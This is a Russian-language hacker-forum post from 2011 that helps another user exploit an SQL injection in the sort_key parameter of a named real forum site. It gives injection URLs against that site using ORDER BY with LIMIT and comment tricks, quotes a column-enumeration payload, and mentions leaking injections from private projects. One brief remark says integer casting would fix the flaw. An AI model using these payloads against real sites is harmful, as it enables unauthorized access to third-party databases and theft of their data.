23.02.2011, 21:34
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Мб поздно отвечаю, но раньше не мог...
Сообщение от foozzi
нашол вот такую уязвимость
http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=22'
как ее использовать?
После ордер бай
http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=2 DESC limit 0,1-- 1
http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=2 DESC limit 0,10-- 1
Сообщение от Фараон
Как говорил
Dr.Z3r0
В данном примере фильтровать вообще ничего не нунжно, достаточно преобразовывать в целочисленное значение.
И да, тебе отдельный привет за слитие скуль из приватов других проэктов, ну ты понял.
Ну и как написал выше Redwood там был нарушен синтаксис=/
Сообщение от Redwood
Эксплуатация:
Код HTML:
1' order by 1,2,3,4,5,6,7,8,9,10-- a
Зачем сортировать перебирая все колонки, если можно сразу указать максимальную? |
|
|